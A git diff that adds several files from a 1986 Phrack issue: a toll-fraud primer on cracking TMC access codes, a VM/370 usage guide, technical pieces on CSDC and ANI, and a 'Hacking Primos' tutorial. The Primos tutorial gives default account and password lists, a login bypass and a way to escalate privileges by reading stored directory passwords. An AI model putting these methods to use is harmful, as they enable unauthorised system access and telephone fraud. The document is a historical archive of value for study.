+-------------------------------------------------------------------------------
+
+I hope you enjoyed this file, look forward to more Phrack Pro-Philes coming in
+the near future.  ...And now for the regularly taken poll from all interviewees.
+
+Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?  Only The Pirate, a 13 year old, fit
+this description.  Thank you for your time, Dave.
+
+                                            Taran King
+                                   Sysop of Metal Shop Private
diff --git a/phrack10/3.txt b/phrack10/3.txt
new file mode 100644
index 0000000..2b757d3
--- /dev/null
+++ b/phrack10/3.txt
@@ -0,0 +1,127 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #3 of 9
+
+                      **********************************
+                      *         The TMC Primer         *
+                      *--------------------------------*
+                      *     Written by: Cap'n Crax     *
+                      *--------------------------------*
+                      *        December 17, 1986       *
+                      **********************************
+
+
+This file was originally intended to be a "data file" of info on TMC ports,
+formulas, etc, but I decided that it would serve a better use as a "tutorial"
+of sorts. But first a bit of background info...
+
+Who is TMC?
+
+TMC (TeleMarketing Communications) is a long distance service serving all 50
+states.  While not as well known as MCI or Sprint, they are a fairly large
+company.  They are capable of setting up business communications systems,
+PBX's, and residential service.  Unlike most LDC's, however, they operate on a
+"franchise" basis, which means that each franchise of the company has little
+information about any other franchise, although they do use the same lines and
+the same type of equipment.
+
+So, what can they do for me?
+
+Well, for most of us, TMC offers many new potentials for abuse.  One of the
+primary weak points of the company is the code formats that they decided to
+use.  Codes on all TMC ports are seven digits.  If they were generated
+randomly, this would be a reasonably secure system from sequential code
+hacking.  But TMC doesn't use random codes. Instead, they use a checksum based
+formula system, with different formulas on each port.  I assume that this is
+because they wanted a wide displacement of the codes over the seven-digit
+series, so that a sequential code hacker wouldn't be able to get 2 or 3 good
+codes in a row.  Or perhaps they are just very stupid.  In any case, it's
+interesting that they seem to have never thought of what could happen if
+anyone ever managed to figure out any of these formulas. Anyway, that's what
+this file is about.
+
+Great!  What else can you tell me?
+
+Well, TMC seems to use some form of the Dimension PBX system for their billing
+system (Their ads say that the switching equipment is digital).  This makes
+TMC ports easily identifiable by the "Hi-Lo" bad code siren.  For those who
+worry about such things, TMC is one of the "safer" companies to use. This is
+largely because, unlike "unified" companies like MCI, TMC franchises don't
+really care if another franchise is losing money. Since each franchise is
+independent of all others, there are many 800 ports, one for each franchise.
+If you use an out-of-state 800 port, you are free from such worries as ANI,
+which I have never perceived as a major threat to the code-user anyway.  Also,
+TMC offers lots of opportunities for the aspiring security consultant
+(hehehe).
+
+Ok, so where's some real info?
+
+Right here.  I am going to explain as much about TMC hacking as I can manage,
+without actually handing out codes.  First, an example port. The example I am
+using is the 800 port for Louisville, KY.
+
+1-800-626-9600
+
+This is the port.  If you are not familiar with TMC, you may want to call it
+to see what it sounds like.  So let's say you call it and recognize it as a
+TMC.  What next?  Well, a good bet would be to run a standard "code-hack"
+program on it...  Set it for seven digits, 1+ the number, and note that TMC
+codes start with 0 on more than 50% of the ports I have seen. So let's say
+that you then get this list of (fictional) codes...
+
+0347589
+0347889
+0348179
+0350358
+0355408
+
+At first glance, this may look like a series of "random" numbers.  But, look
+closer.  These numbers are based on a checksum.  It is as follows...
+
+Code Format: 03xabcy
+x+y=13
+(In the first code, x=4 and y=9, and, of course, 4+9=13)
+a+c=15
+(Here, a=7 and c=8, and 7+8=15)
+b=1 to 9
+(Digit "b" is unrelated to the rest of the numbers.  It could, for example, be
+varied from 1-9 to possibly find more working codes)
+
+Also note that 0+5 would equal 15, since the 0 is really a 10. Really!
+
+Please note that the above formula is only fictional.  I wouldn't want to
+possibly cause loss to TMC by giving away codes on their system!
+
+Is that all?
+
+No, of course not.  TMC, in their love of telecom enthusiasts, has also put an
+additional prize in the Krackerjack box.  The vast majority of TMC ports have
+"Outside Line" codes, which is a 2 or 3 digit number, that, when entered after
+certain codes, will give an AT&T dialtone.  This is apparently a holdover from
+the fact that they are using PBX equipment.  Anyway, if anyone is asking why
+you'd want an AT&T dialtone, (does anyone need to ask?) it will allow
+unrestricted calling.  This, of course, means 976's, 900's, Alliance
+Teleconf., international calling, etc... Naturally, I can't list any of these,
+but I can say that if it is 2 digits, it would start with any number from 2-9
+and end in 8 or 9.  If it is three digits, it will almost always start with 6,
+and be followed by any two digits. Some possible outside line codes would be
+59, 69, 89, 99, 626, 636, 628, etc...  These, of course, are only examples of
+possible codes. As I mentioned, these O/S line codes are entered after the
+seven digit code.  The O/S line codes only work after certain 7-digit codes,
+and from my experience, the 7-digit codes that they work with normally can't
+be used for the usual 7 digits+1+number dialing. I can find no apparent
+pattern to the codes that they do work with, so you will have to find them by
+trial-and-error.
+
+What, you want more?
+
+Ok, well, here's a few 800 ports...
+
+1-800-433-1440     1-800-227-0073     1-800-331-9922     1-800-451-2300
+1-800-354-9379     1-800-248-4200     1-800-531-5084     1-800-351-9800
+
+Closing.
+
+Please note that this article is only intended as an overview of TMC and why
+they would/wouldn't be a good choice for your long distance needs.  And
+goodness me, don't use any of this information in an illegal way!
diff --git a/phrack10/4.txt b/phrack10/4.txt
new file mode 100644
index 0000000..fb656ef
--- /dev/null
+++ b/phrack10/4.txt
@@ -0,0 +1,169 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #4 of 9
+
+                            A Beginner's Guide to:
+                                The IBM VM/370
+                    (or what to do once you've gotten in)
+
+                        A monograph by Elric of Imrryr
+                     Presented by Lunatic Labs UnLimted.
+
+                              KopyRite (K) 1986
+                            RePrint what you like
+                  Note: This file is formatted for printing
+                       on a 80 Column, 55 line printer.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+        PREFACE: What this guide is about.
+This was written to help Hackers learn to basics of how to function on an
+IBM VM/370. Not as a guide on how to get in, but on how to use it one
+you have gotten in.
+Comments on this are welcome at RIPCO 312-528-5020.
+Note: To VM/370 Hackers, feel free to add to this file, just give myself
+& Lunatic Labs credit for our parts.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+        PART 1: Logging in & out
+When you connect to a VM/370 system hit RETURN till you see:
+
+VM/370
+!
+
+To logon you type:
+logon userid ('logon' may be abbreviated to 'l')
+If you enter an invalid userid, It will respond with a message:
+'userid not in cp directory'.
+If it is valid you with get:
+ENTER PASSWORD:
+Enter your password, then your in, hopefully....
+
+Logging Out:
+Type:
+log
+
+        PART 2: Loading CMS & Getting set up
+When you logon, if you do not see the message 'VM/SP CMS - (date) (time)
+you will need to load 'CMS' (CMS in a command interpreter).
+Type:
+cp ipl cms
+You should then see something like this:
+R; T=0.01/0.01 08:05:50
+
+Now you will be able to use both CP & CMS commands...
+Some system my think you are using an IBM 3270 Terminal, if you can
+emulate a 3270 (for example with Crosstalk) do so, if not type:
+set terminal typewriter or set terminal dumb
+
+        PART 3: Files
+You can list your files by typing:
+filelist
+
+Wildcards can be used, so:
+filelist t*
+list all files beginning with a 't'.
+Filenames are made up of a FILENAME and FILETYPE
+
+You can list a file by typing:
+listfile filename filetype
+
+Other file commands are: copyfile, erase, and rename, they all work with
+FILENAME FILETYPE.
+
+        PART 4: Editing your files
+I'm going to keep this down to the basics and only discuss one editor
+XEDIT. To use XEDIT type:
+xedit filename filetype
+Once in XEDIT, enter the command 'input' to enter text, hit a RETURN on
+a blank line to return to command mode, then enter the command 'FILE' to
+save your file.
+
+        PART 5: Communicating with others on the system
+Sending & receiving 'NOTES':
+To send a 'NOTE' to another user type:
+note userid
+
+You will then be in the XEDIT subsystem, see PART 4.
+Once you are done writing your NOTE, save the file and type:
+send note
+
+This will send the NOTE to userid.
+You can also use the SEND command to send other files by typing:
+send filename filetype userid.
+
+Sending messages:
+You can use the TELL command to communicate with a user who is current
+logged on, type:
+tell userid Help me!
+
+        PART 6: Getting Help
+Type:
+help
+
+        That's it, good luck.
diff --git a/phrack10/5.txt b/phrack10/5.txt
new file mode 100644
index 0000000..9ebae1c
--- /dev/null
+++ b/phrack10/5.txt
@@ -0,0 +1,229 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #5 of 9
+
+                 ^                                         ^
+               [<+>]                                     [<+>]
+               /|-|\                                     /|-|\
+               \|P|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|P|/
+                |h|           ^                 ^         |h|
+                |a|          ]+[The Executioner]+[        |a|
+                |n|                                       |n|
+                |t|      Call Phreak Klass, Room 2600     |t|
+                |o|            [806][799][0016]           |o|
+                |m|                                       |m|
+                |s| [Circuit Switched Digital Capability] |s|
+                |-|  -----------------------------------  |-|
+                |S|                                       |S|
+                |e|  Part I of II in this series of files |e|
+                |x|                                       |x|
+                |y|      Written for PHRACK, Issue 10.    |y|
+               /|-|\                                     /|-|\
+               \|$|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|$|/
+               [<+>]                                     [<+>]
+
+========
+=Part I=
+========
+
+
+The Circuit Switch Digital Capability (CSDC) allows for the end to end digital
+transmission of 56 kilobits per second (kb/s) data and, alternately, the
+transmission of analog voice signals on a circuit switched basis.
+
+=====================
+=Network Perspective=
+=====================
+
+
+The CSDC feature was formerly known as PSDC (Public Switched Digital
+Capability). These two terms can be used synonymously. The CSDC feature
+provides an alternate voice/data capability. If a SLC Carrier System 96 is
+used, digital signals are transmitted by T1 signal. If the loop is a two wire
+loop, the CSDC feature utilizes time compression multi-plexing (TCM) which
+allows for the transmission of digital signals over a common path using a
+separate time interval for each direction. During a CSDC call an end user may
+alternate between the voice and data modes as many times as desired. The CSDC
+feature can support sub-variable data rates from customer premises equipment,
+but a 56 kb/s rate is utilized in the network. Some possible applications of
+the CSDC feature are:
+
+     1. Audiographic Teleconferencing.
+     2. Secure Voice.
+     3. Facsimile.
+     4. Bulk Data.
+     5. Slow scan television.
+
+The ESS switch provides end user access and performs signalling, switching,
+and trunking functions between the serving ESS switch and other CSDC offices.
+End users of CSDC require a network channel terminating equipment circuit
+(NCTE) which is the SD-3C476 or its equivalent. End user access is over 2-wire
+metallic loops terminating at the metallic facility terminal (MFT) or SLC
+Carrier System. End users not served directly by a direct CSDC ESS office, can
+access CSDC equipment through a RX (Remote Exchange) access arrangement via
+use of a D4 Carrier System and if required, a SLC Carrier System. The
+T-Carrier trunks serve for short haul transmissions while long haul
+transmissions are served by digital microwave radio and other digital systems.
+
+If the NCTE interface is used with customer premises equipment, a miniature
+8-position series jack is used to connect the NCTE to other equipment. The
+jack pins are paired off; data transmit pair, data receive pair, a voice pair,
+and a mode switch pair. The data pairs support the simultaneous transmission
+and reception of digital data in a bipolar format at 56 kb/s. The data pairs
+also provide for the xmission of control information to and from the network.
+The voice pairs supports analog signal transmission and provides for call
+setup, disconnect and ringing functions. The mode control pair provides
+signals to the network when a change in mode (voice to data/data to voice) is
+requested by the customer.
+
+A CSDC call is originated over a 2-wire loop which can also be used for
+Message Telecommunication Service (MTS) calls. Lines may be marked (MTS/CSDC
+or CSDC only). Touch tone is needed to originate a CSDC call. Originations may
+be initiated manually or with Automatic Calling Equipment (ACE) if available.
+Digit reception, transmission and signalling follow the same procedures used
+for a MTS outgoing call on CCIS or non-CCIS trunks. However CSDC calls are
+ALWAYS routed over digital transmission facilities.
+
+
+
+The long term plan also allows for EA-MF (Equal Access-Multi Frequency)
+signalling and improved automatic message accounting (AMA) records. A CSDC
+call is screened to ensure that the originating party has CSDC service and
+that the carrier to be used provides 56 kb/s voice/data capability. A blocked
+call is routed to a special service error announcement. Non-CSDC calls are not
+allowed to route over CSDC-only carriers. Non-payer screening is not allowed
+for CSDC calls using CCIS signalling.
+
+A CSDC call is routed directed to the carrier or indirectly via the Access
+Tandem (AT) or Signal Conversion Point (SCP). The call is terminated directly
+from the carrier to the end office or indirectly via the AT or SCP. Signalling
+for direct routing is either CCIS or EA-MF and is assigned on a trunk group
+basis.
+
+The AT is an ESS switch which allows access to carriers from an end office
+without requiring direct trunks. Signalling between end offices and the AT is
+either EA-MF or CCIS. Trunks groups using EA-MF signalling can have combined
+carrier traffic.  Separate trunk groups for each carrier are required for CCIS
+signalling.
+
+The SCP is an ESS switch which allows access to carriers using only CCIS
+signalling from offices without the CCIS capability. Separate trunk groups for
+each carrier are used between the originating end office and the SCP. Separate
+trunk groups are optional between the SCP and the terminating end office and
+the terminating end office. Signalling between the end office and the SCP is
+MF. The SCP must have direct connection to the carrier using CCIS signalling.
+
+=========================
+=Remote Switching System=
+=========================
+
+The RSS can be used as a remote access point for CSDC. The compatibility of
+RSS and CSDC improves the marketability of both features. The RSS design
+allows a provision for the support of D4 special service channel bank
+plug-ins. This provision allows for such applications as off premises
+extensions, foreign exchanges lines, and private lines. Thus the RSS can be
+used as a CSDC access point in a configuration similar to the CSDC RX
+arrangement.
+
+================
+=Centrex/ESSX-1=
+================
+
+The CSDC feature is optionally available to Centrex/ESSX-1 customers. Most of
+the capabilities of Centrex service can be applied to Centrex lines that have
+been assigned the CSDC feature. In voice mode, the Centrex/CSDC line can
+exercise any of the Centrex group features that have been assigned to the
+line. In the voice/data mode, several Centrex features are inoperable or
+operate only on certain calls. The CSDC feature can be provided for a Centrex
+group as follows:
+
+     1. Message Network Basis (MTS)
+     2. IntraCentrex group basis
+     3. InterCentrex group basis
+     4. Any combination of the above
+
+===============================
+=User Perspective for the CSDC=
+===============================
+
+To establish a CSDC call, a CSDC user goes off hook, receives dial tone and
+dials. The dialing format for the CSDC/MTS is as follows for interim plan:
+
+     #99 AB (1+) 7 or 10 digits (#)
+
+The customer dials '#99' to access the CSDC feature. The 'AB' digits are the
+carrier designation code. No dial tone is returned after the 'AB' digits. The
+1+ prior to the 7 or 10 digit directory number must be used if it is required
+for MTS calls.  The '#' at the end is optional, if it is not dialed, end of
+dialing is signalled by a time-out.
+
+The long term dialing format for the CSDC/MTS is as follows:
+
+     #56 (10XXX) (1+) 7 or 10 digits (#)
+
+Dialing '#56' indicates 56kb/s alternate voice/data transmission. the '10XXX'
+identifies the carrier to be used for the call. If '10XXX' is not dialed on an
+inter-LATA call, the primary carrier of the subscriber is used. If '10XXX' is
+not dialed on an intra-LATA call, the telco handles the call. The long term
+plan also allows for several abbreviated forms. Dialing '#56 10XXX #' is
+allowed for routing a call which prompts the customer to dial according to the
+carrier dialing plan. Dialing '#56 10XXX' followed by a speed call is also
+allowed. If a customer has pre-subscribed to a carrier which can carry CSDC
+calls and the CSDC access code is stored as part of the speed calling number,
+the customer dials the speed calling code to make a CSDC call.
+
+Regular ringing is applied to the called line and audible ringing is applied
+to the calling terminal. Once the voice connection is established, either
+party can initiate the switch to data mode, if desired. To initiate a change
+in mode a CSDC user must initiate a mode switch command via a closure of the NCT
+
+An example of a mode switch:
+
+     Suppose party A wants to switch to data. Party A issues a mode switch
+command and receives a signal called far end voice (FEV) which is a bipolar
+sequence (2031 hz at 60 ipm). Party A may now hang up the handset at any time
+after initiating the mode switch command. Party B receives a far end data
+(FED) tone (2031 Hz at 39 ipm) indicating party A wants to switch to data. If
+party B agrees to switch to data, party B must initiate a mode switch command.
+Party B may nor hang up the handset. Data transmission is now possible.
+     To switch to the voice mode, anyone can initiate it. To switch, party A
+would pick up the handset and initiate a mode switch command and will receive
+the FED tone. Party B receives the FEV tone indicating that party A wants to
+go voice. Party B must now pick up the hand set and initiate a mode switch
+command. To terminate a call, either party may just leave the handset on and
+indicate a mode switch. If termination is issued during a mode conflict, time
+out will disconnect the call, usually about 10 or 11 seconds.
+
+Centrex/ESSX-1 customers may utilize the CSDC service in several ways if they
+have CSDC terminals with the necessary on premises equipment. The standard
+CSDC call is initiated by dialing the message network access code, (9). The
+dialing sequence is then identical to the plan for MTS:
+
+     #99 AB (1+) 7 or 10 digits (interim plan)
+
+     #56 (10XXX) (1+) 7 or 10 digits (#) (long term plan)
+
+The dialing pattern to establish interCentrex or intraCentrex CSDC calls is as
+follows:
+
+     CSDC access code + extension
+
+An intraCentrex/CSDC call is initiated by dialing the trunk access code
+assigned to route a loop-around Centrex/CSDC trunk group. Next, the extension
+of the desired station is dialed. To establish an interCentrex call a
+different trunk access code must be used to route the CSDC calls to another
+Centrex group instead of a station.
+
+The CSDC maintenance circuit has a dialable digital loopback. This loopback is
+very useful in CSDC testing. A customer can check their access line by dialing
+the test DN. The loop is automatically activated when the call is answered.
+
+================
+=End of Part I.=
+================
+
+Part II: The CSDC hardware, and office data structures.
+
+=======================================================
+= (c) 1986 The Executioner and The PhoneLine Phantoms =
+=======================================================
diff --git a/phrack10/6.txt b/phrack10/6.txt
new file mode 100644
index 0000000..d7b8d30
--- /dev/null
+++ b/phrack10/6.txt
@@ -0,0 +1,327 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #6 of 9
+
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+                    !                                   !
+                    #       Hacking Primos Part I       #
+                    !                                   !
+                    #            By Evil Jay            #
+                    !                                   !
+                    #     Phone Phreakers of America    #
+                    !                                   !
+                    #            (C) 1986-87            #
+                    !                                   !
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+
+
+Author Note:
+
+I should begin by saying that there are other files out there about hacking
+Primos, one written recently, that basically tell you nothing at all as far as
+in-depth Primos is concerned. Those files should be deleted and this put in
+its place. This is the first in many files on Primos, and I will go into many
+topics, such as the on-line network, the different subsystems and other
+subjects. Hope you enjoy!
+
+
+*** Gaining Entry Part 1 ***
+
+Gaining entry, as always, is the hardest part.
+
+When you call a Primos system it will connect with something like this:
+
+
+PRIMENET 19.2.7F PPOA1
+
+
+If it doesn't give a welcome msg like above trying typing something like
+"XXZZZUUU" and hit return and it should come back with:
+
+Invalid command "XXZZZUUU".  (logo$cp)
+Login please.
+ER!
+
+To login you type:
+
+LOGIN <USER ID> <RETURN/ENTER>
+
+Or Just:
+
+LOGIN <RETURN/ENTER>
+(Then it will ask for your "User ID?")
+
+
+User ids differ from system to system but there are ALWAYS default accounts to
+try. For "User ID?" try...
+
+SYSTEM (This is the operators account and with it you can usually do
+        anything.)
+LIB
+DOS
+
+After you enter your User ID it will prompt you with:
+
+Password?
+
+This is of course, where you enter your password. For SYSTEM try...
+
+SYSTEM
+SYSMAN
+NETLINK
+PRIMENET
+MANAGER
+OPERATOR
+
+And anything else you can think of. These are just common passwords to these
+defaults.
+
+For LIB try...
+
+LIBRARY
+SYSLIB
+LIB
+SYSTEM
+
+For DOS try...
+
+DOS
+SYSDOS
+SYSTEM
+
+Etc...Just use your brain.
+
+
+*Older Versions*
+
+On older versions of Primos, 18 and below, you could enter one of the system
+defaults above and hit CTRL-C once or twice for the password and it would drop
+you into the system. Whether this is a bug or intentional I don't really have
+any idea. But it does work sometimes. To see what ver of Primos your trying to
+logon to just look at the welcome message when you logon:
+
+PRIMENET 19.2.7F PPOA1
+
+19 is the version number. So thus, if you were logging on to this particular
+Prime you would NOT be able to use the above mentioned bug/default-password.
+
+By the way, if you do not know what version it is (because it did not give you
+a welcome msg when you connected...try to do the above mentioned anyway.)
+
+
+Now, if it says:
+
+
+Invalid user id or password; please try again.
+
+
+Then you must try a different password. Notice, that the system informs you
+that either the User ID, the password or both are wrong. Don't worry about
+this...just hack the defaults. There have been a lot of rumors spreading
+around about common defaults such as: PHANTOM, PRIMOS, PRIME & FAM, but I
+believe this to be a load of shit. I have never seen a system with these
+defaults on them. But, as far as PRIMOS and PRIME go, these are sometimes
+common accounts but I really don't believe that they are defaults. Also try
+accounts like DEMO & GUEST. These are sometimes common accounts (but never
+very often).
+
+Primos does not have limited commands before logon such as Tops 20 and DEC. So
+hacking a Primos is really nothing but taking a guess.
+
+
+** No passwords **
+
+Some users have been known to use a carriage return for their password which
+in other words means, once you enter your user id, your logged in without
+having to enter a password. Sometimes, these are default passwords assigned by
+the system operator, but that is rare. If you can get the format (perhaps you
+already have any account) for the regular user id's, then try passwords like:
+
+NETLINK
+SYSTEM
+PRIME
+PRIMENET
+PRIMOS
+
+And other typical user passwords like sex, hot, love...etc. Most female users
+that I have talked to on a local university prime all seem to have picked
+account that have something to do with sex...sex being the most popular.
+
+
+** The Format **
+
+The format for a user id can be just about ANYTHING the operators or system
+owners want...and they are usually random looking things that make no sense.
+They can be a combination of numbers, numbers and I am almost sure CTRL
+characters can be used. Lower & Upper case do not matter...the system, changes
+all lower case entry to upper case. Passwords can be anything up to 16
+characters in length.
+
+
+** Your In! **
+
+If you get a valid ID/Password you will see something like this:
+
+
+
+PPOA1 (user 39) logged in Monday, 15 Dec 86 02:29:16.
+Welcome to PRIMOS version 19.4.9.
+Last login Friday, 12 Dec 86 08:29:04.
+
+
+Congratulate yourself, you just did something that should be called something
+of an achievement!
+
+The next part will deal with very basic commands for beginners. I would like
+to end this part with a few more words. Yes, Primos is hard to hack, but given
+the time and patience almost every system has those basic demo accounts and
+CAN be hacked. Most hackers tend to stay away from Primes, little knowing that
+Primos is a system that is very entertaining and certainly kept me up late
+hours of the night. Have fun and keep on hacking. If you have any questions or
+comments, or I have made some sort of error, by all means get in touch with me
+at whatever system you have seen me on...
+
+
+** Now For The Good Shit **
+
+This part was originally going to be a beginners introduction to commands on a
+Primos system. Instead I decided to write a part which should help ANYONE with
+a low level account gain system access. I would also like to thank PHRACK Inc.
+on the wonderful job they are doing...without PHRACK I don't really know for
+sure how I would have distributed my files. Oh yes, I know of all the other
+newsletters and the like, but with PHRACK it was only a matter of getting a
+hold of one of the people in charge, which is a simple matter since their
+mailbox number is widely known to the hack/phreak community. I would also like
+to encourage boards of this nature to support PHRACK fully, and I would also
+like to congratulate you guys, once again, for the great job your doing. Now,
+on with the file.
+
+
+
+** Stuff You Should Know **
+
+The explanation I am going to (try to) explain will NOT work all the time...
+probably 60% of the time. Since I discovered this, or at least was the first
+to put it in "print" I would at least ask those system operators out there to
+keep my credits and the credits of my group in this file.
+
+
+** Some More Stuff **
+
+First, this is not exactly a "novice"-friendly file. You should be familiar
+with the ATTACH and SLIST commands before proceeding. They are quite easy to
+learn, and it is really not required to use this file, but just the same,
+these are important commands in learning the Primos system so you should at
+least be familiar with them. To get help on them type:
+
+HELP SLIST
+
+or
+
+HELP ATTACH
+
+You should also play with the commands until you know all of their uses.
+
+
+** Okay, Here We Go **
+
+This file is not going to explain everything I do. I'm just going to show you
+how to get SYS1 privileged accounts.
+
+
+First, log on to your low access account.
+
+Type:
+
+ATTACH MFD
+
+Then get a DIR using:
+
+LD
+
+Okay, your now seeing a dir with a lot of sub-directories. The only files that
+should be in the main directory (most of the time) are BOOT and SYS1. Ignore
+these...look for a file called CCUTIL or something with the word UTILITY or
+UTIL or UTILITIES...something that looks like UTILITY...
+
+
+Okay, ATTACH to that directory with:
+
+ATTACH <NAME OF DIRECTORY>
+
+Now, do an LD again and look at the files. Now, here is the part that is
+really random. Since not every PRIME system will have the same UTILITY
+programs, just look at any that have an extension ".CPL". There might be one
+called USRLST.CPL. Type:
+
+
+SLIST USRLST <NO NEED TO TYPE ".CPL" AT THE END.>
+
+
+Okay, it should be printing a whole bunch of bullshit. Now in this program
+there SHOULD be a line that looks like the following:
+
+
+A CCUTIL X
+
+
+Now, CCUTIL is the name of the dir you are on so I have to point out that
+CCUTIL WILL NOT ALWAYS BE THE NAME OF THAT UTILITY DIRECTORY. So if the name
+of the UTILITY directory you are on is called UTILITY then the line will look
+like this:
+
+
+A UTILITY X
+
+
+Now, the X is the PASSWORD OF THAT DIRECTORY. AGAIN, IT CAN BE ANYTHING. The
+password may be UTILITY which means it will look like this:
+
+
+A UTILITY UTILITY
+
+
+Or the password may be SECRET. So:
+
+
+A UTILITY SECRET
+
+
+Pat yourself on the ass...you know have SYS1 access. Log back in with the
+LOGIN command (or if it doesn't work just LOGOUT and LOGIN again). Enter
+UTILITY or CCUTIL (or WHATEVER THE NAME OF THE DIRECTORY WAS) as the user id.
+Then for the password just enter the password. If this doesn't work, then what
+you will have to do is try out other sub-directories from the MFD directory.
+Then SLIST other programs with the extension. In one of my other PRIME files I
+will fully explain what I have just done and other ways to get the
+directories/ids password.
+
+
+Now, if you don't see any line in the program like:
+
+
+S <NAME OF DIR> <PASSWORD>
+
+
+Then list other programs in the utility program or try other directories. I
+have gained SYS1 access like this 60% of them time. And NOT ALWAYS ON THE
+UTILITY DIRECTORY.
+
+
+That is about it for this file. Stay tuned for a future PHRACK issue with
+another PRIME file from me. If I don't change my mind again, the next file
+will deal with basic commands for beginners.
+
+
+
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+                    !                                   !
+                    #         This Has Been An:         #
+                    !                                   !
+                    #       Evil Jay Presentation       #
+                    !                                   !
+                    #     Phone Phreaks of  America     #
+                    !                                   !
+                    #            (C) 1986-87            #
+                    !                                   !
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
diff --git a/phrack10/7.txt b/phrack10/7.txt
new file mode 100644
index 0000000..d5b267d
--- /dev/null
+++ b/phrack10/7.txt
@@ -0,0 +1,170 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #7 of 9
+
+                       Automatic Number Idenfification
+
+
+                 Written by Doom Prophet and Phantom Phreaker
+
+
+    Automatic Number Identification (ANI) is nothing more than automatic means
+for immediately identifying the Directory Number of a calling subscriber. This
+process made it possible to utilize CAMA* (Centralized Automatic Message
+Accounting) systems in SxS, Panel, and Xbar #1 offices.
+
+    The identity of the calling line is determined by ANI circuits installed
+in the types of CO's mentioned above. Xbar#5 offices have their own AMA
+(Automatic Message Accounting) equipment and utilize an AMA translator for
+automatically identifying the calling line.
+
+    Before ANI was developed, each subscriber line (also called a local loop)
+had a mechanical marking device that kept track of toll charges. These devices
+were manually photographed at the end of the billing period and the amount of
+the subscribers bill was determined from that. This process was time
+consuming, so a new system (ANI) was developed.
+
+      The major components of the ANI system used in SxS and Crossbar #1 are:
+
+Directory number network and bus arrangement* for connecting the sleeve(the
+lead that is added to the R(ing) and T(ip) wires of a cable pair at the MDF*
+(Main Distribution Frame));
+
+A lead of each line number through an identifier connector to the identifier
+circuit;
+
+Outpulser and Identifier connector circuit to seize an idle Identifier;
+
+Identifier circuit to ascertain the calling party's number and send it to the
+outpulser for subsequent transmission through the outpulser link to the ANI
+outgoing trunk;
+
+An ANI outgoing trunk to a Tandem office equipped with a CAMA system.
+
+    The following is a synopsis of the ANI operations with respect to a toll
+call through a #1Xbar office. The call is handled in the normal manner by the
+CO equipment and is routed through an ANI outgoing trunk to a Tandem office.
+The identification process starts as soon as all digits of the called number
+are received by the CAMA sender in the Tandem office and when the district
+junctor in the Xbar office advances to its cut-through position (a position of
+the connecting circuits or paths between the line-link and trunk-link frames
+in the CO).
+
+      Upon receiving the start identification signal from the CAMA equipment,
+the ANI outgoing trunk (OGT) establishes a connection through an outpulser
+link to an idle outpulser circuit. An idle identifier is then seized by the
+outpulser circuit through an internal Identifier connector unit. Then the
+identifier through the connector unit connects to the directory number network
+and bus system.
+
+    At the same time, the identifier will signal the ANI trunk to apply a
+5800Hz identification tone to the sleeve lead of the ANI trunk. The tone is
+transmitted at a two-volt level over the S lead paths through the directory
+number network and bus system. It will be attenuated or decreased to the
+microvolt range by the time the identifier circuit is reached, necessitating
+a 120dB voltage amplification by the amplifier detector equipment in the
+identifier to insure proper digit identification and registration operations.
+
+    A single ANI installation can serve as many as six CO's in a multi-office
+building. The identifier starts its search for the calling line number by
+testing or scanning successively the thousands secondary buses of each CO.
+When the 5800Hz signal is detected, the identifier grounds corresponding leads
+to the outpulser, to first register the digit of the calling office and then
+the thousands digit of the calling subscriber's number. The outpulser
+immediately translates the digit representing the calling office code into its
+own corresponding three digit office code. The identifier continues its
+scanning process successively on the groups of hundreds, tens, and units
+secondary buses in the calling office, and the identified digits of the
+calling number are also registered and translated in the outpulser's relay
+equipment for transmission to the tandem office.
+The outpulser is equipped with checking and timing features to promptly detect
+and record troubles encountered (This process may be responsible for some of
+the cards found while trashing). Upon completion of the scanning process, it
+releases the identifier and proceeds to outpulse in MF tones the complete
+calling subscriber's number to the CAMA equipment in the tandem office in the
+format of KP+X+PRE+SUFF+ST where the X is an information digit. The
+information digits are as follows:
+
+0-Automatic Identification (normal)     1-Operator Identification (ONI)*
+2-Identification Failure (ANIF)*
+
+(There is also other types of outpulsing of ANI information if the calling
+line has some sort of restriction on it).
+
+    When all digits have been transmitted and the ANI trunk is cut-through for
+talking, the outpulser releases.
+
+    In the tandem office, the calling party's number is recorded on tape in
+the CAMA equipment together with other data required for billing purposes.
+This information, including the time of when the called station answered and
+the time of disconnect, goes on AMA tapes.
+The tapes themselves are usually standard reel to reel magnetic tape, and are
+sent to the Revenue Accounting Office or RAO at the end of the billing period.
+
+    So, to sum the entire ANI process up:
+
+The toll call is made. The CO routes the call through ANI trunks where an idle
+identifier is seized which then connects to the directory number network and
+bus system while signalling the ANI trunk to apply the needed 5800Hz tone to
+the Sleeve. The identifier begins a scanning process and determines the
+calling office number and the digits of the calling subscriber's number, which
+is sent by way of the outpulser in MF tones to the CAMA equipment in the
+tandem office. The call information is recorded onto AMA tapes and used to
+determine billing.
+
+    Note that your number does show up on the AMA tape, if the circumstances
+are correct, (any toll call, whether it is from a message-rate line or from a
+flat-rate line). However, the AMA tapes do not record the calling line number
+in any separated format. They are recorded on a first-come, first-serve basis.
+
+
+Misc. Footnotes (denoted by an asterisk in the main article)
+---------------
+
+* ANIF-Automatic Number Identification Failure. This is when the ANI equipment
+does not work properly, and could occur due to a wide variety of technical-
+ities. When ANIF occurs, something called ONI (Operator Number Identification)
+is used. The call is forwarded to a TSPS operator who requests the calling
+line number by saying something similar to 'What number are you calling from?'
+
+* CAMA-Centralized Automatic Message Accounting. CAMA is a system that records
+call details for billing purposes. CAMA is used from a centralized location,
